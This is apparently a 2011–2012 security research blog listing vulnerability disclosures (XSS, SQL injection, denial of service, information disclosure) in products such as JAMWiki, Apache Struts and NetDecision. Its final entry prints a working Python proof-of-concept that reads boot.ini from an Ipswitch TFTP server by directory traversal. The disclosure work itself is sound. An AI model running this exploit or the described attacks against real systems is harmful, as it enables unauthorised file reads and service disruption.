SecPod Research Blog

ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities

Veerendra GG — Fri, 30 Mar 2012 05:40:02 +0000

SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities in ArticleSetup. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

JAMWiki ‘num’ Parameter Cross Site Scripting Vulnerability

Veerendra GG — Fri, 30 Mar 2012 05:30:47 +0000

SecPod Research Team member (Sooraj K.S) has found Cross-Site Scripting Vulnerabilities in JAMWiki. The vulnerability is caused by improper validation of “num” parameter in “Special:AllPages” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability

Veerendra GG — Tue, 28 Feb 2012 05:09:42 +0000

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Netmechanica NetDecision HTTP Server. The vulnerability is caused due to improper validation of long malicious HTTP request to web server, which allows remote attackers to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability

Veerendra GG — Tue, 28 Feb 2012 05:04:46 +0000

SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Traffic Grapher Server. The vulnerability is caused due to improper validation of malicious HTTP GET request to Traffic Grapher Server ‘default.nd’ with invalid HTTP version number followed by multiple ‘CRLF’, which discloses the source code of ‘default.nd’

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability

Veerendra GG — Tue, 28 Feb 2012 04:57:42 +0000

SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Dashboard Server. The vulnerability is caused due to improper validation of malicious HTTP request to Dashboard server appended with ‘?’ character, which discloses the Dashboard server’s web script physical path.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

OfficeSIP Server Denial Of Service Vulnerability

Veerendra GG — Wed, 01 Feb 2012 09:26:22 +0000

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in OfficeSIP Server. The vulnerability is caused due to improper validation of SIP/SIPS URI in the ‘To’ header of the request. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

NetSarang Xlpd Printer Daemon Denial of Service Vulnerability

Veerendra GG — Wed, 01 Feb 2012 09:21:04 +0000

SecPod Research Team member (Prabhu S Angadi) has found Denial of Service Vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Sphinix Mobile Web Server Multiple Persistence XSS Vulnerabilities

Veerendra GG — Wed, 01 Feb 2012 09:14:55 +0000

SecPod Research Team member (Prabhu S Angadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Sphinix Mobile Web Server Blog. The vulnerability is caused by improper validation of “comment” parameter in “/Blog/MyFirstBlog.txt” and “/Blog/AboutSomething.txt” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities

Veerendra GG — Wed, 01 Feb 2012 09:08:47 +0000

SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Apache Struts. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Ipswitch TFTP Server Directory Traversal Vulnerability

Veerendra GG — Fri, 02 Dec 2011 06:21:35 +0000

SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team